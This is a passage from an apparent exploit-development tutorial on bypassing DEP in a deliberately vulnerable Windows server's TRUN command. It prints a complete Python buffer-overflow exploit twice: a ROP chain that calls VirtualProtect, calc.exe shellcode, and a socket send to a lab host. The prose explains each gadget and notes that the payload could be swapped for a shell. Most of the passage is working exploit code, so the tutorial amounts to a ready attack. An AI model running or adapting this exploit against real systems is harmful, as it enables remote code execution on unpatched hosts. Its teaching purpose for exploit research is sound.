rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

EAX get “zeroed out”:

EAX now contains the value of what we would like the size parameter to be:

The memory address of the size parameter now points to the value of EAX, which is 0x300!:

It is time now to calculate the flNewProtect parameter.

0x40 is the intended value here. It is placed into EAX:

Then, EDX is increased by four and the DWORD within EDX (the flNewProtect placeholder) it manipulated to point to the value of EAX- which is 0x40! All of our parameters have successfully been added to the stack!:

All that is left now, is we need to jump back to the VirtualProtect call! but how will we do this?!

Remember very early in this tutorial, when we saved the old stack pointer into ECX? Then, we performed some calculations on ECX to increase it to equal the first “parameter”, the return address? Recall that the return address is four bytes greater than the place where VirtualProtect() is called. This means if we can decrement ECX by four bytes, it would contain the address of the call to VirtualProtect().

However, in assembly, one of the best registers to make calculations to is EAX. Since we are done with the parameters, we will move the value of ECX into EAX. We will then decrement EAX by four bytes. Then, we will exchange the EAX register (which contains the call to VirtualProtect() with ESP). At this point, the VirtualProtect() address will be in ESP. Since the exchange instruction will be apart of a ROP gadget, the ret at the end of the gadget will load new ESP (the VirtualProtect() address) into EIP- and thus executing the call to VirtualProtect() with all of the correct parameters on the stack!

There is one problem though. In the very beginning, we gave the arguments for return and lpAddress. These should contain the address of the shellcode, or the NOPS right before the shellcode. We only gave a 100-byte buffer between those parameters and our shellcode. We have added a lot of ROP chains since then, thus our shellcode is no longer located 100 bytes from the VirtualProtect() parameters.

There is a simple solution to this: we will make the address of return and lpAddress 100 bytes greater.

This will be changed at this part of the POC:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
---

We will update it to the following, to make it 100 bytes greater, and land around our shellcode:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget---
---

ROP gadgets for decrementing ECX, moving ECX into EAX, and exchanging EAX with ESP:

0x77e4a5e6: mov eax, ecx ; ret  ; kernel32.dll
0x41ac863b: dec eax ; dec eax ; ret  ;  WS2_32.dll
0x77d6fa6a: xchg eax, esp ; ret  ;  ntdll.dll

After all of the changes have been made, this is the final weaponized exploit has been created:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Now we need to return to where the VirutalProtect call is on the stack.
# ECX contains a value around the old stack pointer at this time (from the beginning). Put ECX into EAX
# and decrement EAX to get back to the function call- and then load EAX into ESP.
# Restoring the old stack pointer here.
rop2 += struct.pack ('<L', 0x77e4a5e6)   # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41ac863b)   # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41ac863b)  # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77d6fa6a)   # 0x77d6fa6a: xchg eax, esp ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

ECX is moved into EAX:

EAX is then decremented by four bytes, to equal where the call to VirtualProtect() occurs on the stack:

EAX is then exchanged with ESP (EAX and ESP swap spaces):

As you can see, ESP points to the function call- and the ret loads that function call into the instruction pointer to kick off execution!:

As you can see, our calc.exe payload has been executed- and DEP has been defeated (the PowerShell windows shows the DEP policy. Open the image in a new tab to view it better)!!!!!:

You could replace the calc.exe payload with something like a shell- sure! This was just a POC payload, and there is something about shellcoding by hand, too that I love! ROP is so manual and requires living off the land, so I wanted a shellcode that reflected that same philosophy.

Final Thoughts

Please email me if you have any further questions! I can try to answer them as best I can. As I continue to start getting into more and more modern day exploit mitigation bypasses, I hope I can document some more of my discoveries and advances in exploit development.

Peace, love, and positivity :-)

